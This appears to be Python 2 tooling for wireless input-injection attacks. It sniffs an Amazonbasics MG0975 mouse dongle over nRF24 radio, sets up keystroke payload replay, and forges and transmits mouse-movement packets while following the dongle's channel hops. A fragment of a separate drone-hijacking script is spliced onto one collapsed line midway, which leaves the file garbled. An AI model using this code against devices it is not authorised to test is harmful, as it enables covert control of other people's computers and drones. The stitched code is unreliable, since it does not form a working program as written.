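#!/usr/bin/env python2
'''
Author: xswxm
Blog: xswxm.com

Send payloads 1,2,3,4,5,6,7,8,9,0 to Amazonbasics MG0975 dongle continuously
e.g.: sudo python exp_attacker.py -l -a 61:8E:9C:CD:03 -f 74 -n 200

Setup half of a keystroke-injection proof of concept against the MG0975
receiver: the radio is put in sniffer mode on the dongle's address and tuned
to a fixed channel so that the payloads can be replayed afterwards.  The tool
performs no check that the target is yours; only run it against hardware you
own or are explicitly authorised to test.
'''
import logging, time
from lib import common

# Register this script's options on top of the shared ones from lib.common.
common.init_args('./exp_attacker.py')
common.parser.add_argument('-a', '--address', type=str,
                           help='Address to sniff, following as it changes channels',
                           required=True)
common.parser.add_argument('-f', '--channel', type=int, help='RF channel', default=0)
common.parser.add_argument('-n', '--times', type=int, help='Replay times', default=0)
common.parse_and_init()

channel = common.args.channel  # RF channel index, handed straight to the radio
n = common.args.times          # number of replays requested; 0 when not given

# 0x27 represents 'a' in this case
# NOTE(review): this is the dongle's own key encoding, not the USB HID usage
# table (where 0x27 is the '0' key); do not substitute HID codes here without
# re-checking against the device.
p = 0x27

# Parse the prefix address: strip the colons, hex-decode, reverse to the
# over-the-air byte order and keep at most 5 bytes.
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
# Reject obviously malformed addresses before touching the radio.  The
# sniffer/injector scripts in this tree apply the same check; without it a
# one-byte address would be accepted silently and the radio configured with it.
if len(address) < 2:
    raise Exception('Invalid address: {0}'.format(common.args.address))

# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)

# Set channel
common.radio.set_channel(channel)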
logging.debug('CRC Failure') state = SEARCHING continue # Pairing is complete elif rx_packet.aileron == 1: time.sleep(0.25) logging.debug('Paired') state = PAIRED break logging.info("Done Pairing") return vid # Init command line args common.init_args('./fly-fly-away.py') common.parse_and_init() # Put the radio in promiscuous mode (generic) common.radio.enter_promiscuous_mode_generic('\x71\x0F\x55', common.RF_RATE_1M) # Tune to 2402 MHz common.radio.set_channel(2) # Pair to a drone vid = pair_drone() # Fly, fly away! fly_fly_away(vid)
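def main():
    '''Inject mouse movements into the target dongle while following its channel.

    Parses the nrf24 command line (address, channel timeout, ACK timeout,
    retries, ping payload), puts the radio in sniffer mode on the target
    address, then loops until the module-level ``running`` flag is cleared:
    re-ping the dongle when the active channel has been quiet for longer than
    the timeout (sweeping ``common.channels`` if the ping fails), turn queued
    mouse deltas from the ``read_mouse_file`` thread into forged mouse packets
    and transmit them, and log any payload the radio receives.

    Module globals used: ``x``, ``y`` (written), ``running``, ``q``,
    ``read_mouse_file``, ``build_payload``, ``common`` (read).

    The injected packets are sent to whatever address is given on the command
    line with no check that the device is yours; use only against hardware
    you are authorised to test.
    '''
    global x, y, running

    # Background reader that feeds mouse records into the queue q.
    mouse_th = threading.Thread(target=read_mouse_file, args=())
    mouse_th.start()

    # The keyboard Listener that used to drive x/y is disabled; the mouse file
    # thread is the only input source now.
    # listener = Listener(
    #     on_press=on_press,
    #     on_release=on_release)
    # listener.start()

    # Keep alive payload 00:40:01:18:A7

    # Parse command line arguments and initialize the radio
    common.init_args('./nrf24-sniffer.py')
    common.parser.add_argument(
        '-a', '--address', type=str,
        help='Address to sniff, following as it changes channels',
        required=True)
    common.parser.add_argument('-t', '--timeout', type=float,
                               help='Channel timeout, in milliseconds', default=100)
    common.parser.add_argument(
        '-k', '--ack_timeout', type=int,
        help='ACK timeout in microseconds, accepts [250,4000], step 250',
        default=250)
    common.parser.add_argument('-r', '--retries', type=int,
                               help='Auto retry limit, accepts [0,15]',
                               default=1, choices=xrange(0, 16), metavar='RETRIES')
    common.parser.add_argument('-p', '--ping_payload', type=str,
                               help='Ping payload, ex 0F:0F:0F:0F',
                               default='00:40:01:18:A7', metavar='PING_PAYLOAD')
    common.parse_and_init()

    # Parse the address: strip colons, hex-decode, reverse to on-air byte
    # order and keep at most 5 bytes.  address_string is the human-readable
    # form used in log lines.
    address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
    address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
    if len(address) < 2:
        raise Exception('Invalid address: {0}'.format(common.args.address))

    # Put the radio in sniffer mode (ESB w/o auto ACKs)
    common.radio.enter_sniffer_mode(address)

    # Convert channel timeout from milliseconds to seconds
    timeout = float(common.args.timeout) / float(1000)

    print('Payload')
    print(common.args.ping_payload)

    # Parse the ping payload
    ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

    # Format the ACK timeout and auto retry values: the radio takes the ACK
    # timeout as a 0-15 index of 250us steps (minus one); both are clamped.
    ack_timeout = int(common.args.ack_timeout / 250) - 1
    ack_timeout = max(0, min(ack_timeout, 15))
    retries = max(0, min(common.args.retries, 15))

    # Sweep through the channels and decode ESB packets in pseudo-promiscuous mode
    last_ping = time.time()
    channel_index = 0
    while running:

        # Follow the target device if it changes channels
        if time.time() - last_ping > timeout:

            # First try pinging on the active channel
            if not common.radio.transmit_payload(ping_payload, ack_timeout, retries):

                # Ping failed on the active channel, so sweep through all available channels
                success = False
                for channel_index in range(len(common.channels)):
                    common.radio.set_channel(common.channels[channel_index])
                    if common.radio.transmit_payload(ping_payload, ack_timeout, retries):

                        # Ping successful, exit out of the ping sweep
                        last_ping = time.time()
                        logging.debug('Ping success on channel {0}'.format(
                            common.channels[channel_index]))
                        success = True
                        break

                # Ping sweep failed
                if not success:
                    logging.debug('Unable to ping {0}'.format(address_string))

            # Ping succeeded on the active channel.  channel_index is whatever
            # the last sweep left it at (0 before any sweep has run), so the
            # channel logged here is only accurate after a successful sweep.
            else:
                logging.debug('Ping success on channel {0}'.format(
                    common.channels[channel_index]))
                last_ping = time.time()

        # Try to send mouse packets if arrow keys has been pressed
        # if x != 0 or y != 0:
        if not q.empty():
            # Each queued record is three signed bytes; the first is ignored
            # and the other two are used as the X/Y deltas.  build_payload
            # returns a hex string, hence the decode before transmitting.
            val = struct.unpack('3b', q.get())
            x = val[1]
            y = val[2]
            mouse_payload = build_payload(0, x, y, 0, 0)
            print(mouse_payload)
            common.radio.transmit_payload(mouse_payload.decode('hex'), ack_timeout, retries)

        # Receive payloads
        value = common.radio.receive_payload()
        if value[0] == 0:

            # Reset the channel timer
            last_ping = time.time()

            # Split the payload from the status byte
            payload = value[1:]

            # Log the packet
            logging.info('{0: >2} {1: >2} {2} {3}'.format(
                common.channels[channel_index], len(payload), address_string,
                ':'.join('{:02X}'.format(b) for b in payload)))

    # End of main loop.  The original called listener.stop() here, but the
    # Listener is never created in this function (its setup is commented out
    # above), so that call raised NameError once ``running`` was cleared.
    # There is nothing to stop; the mouse thread is left to finish on its own.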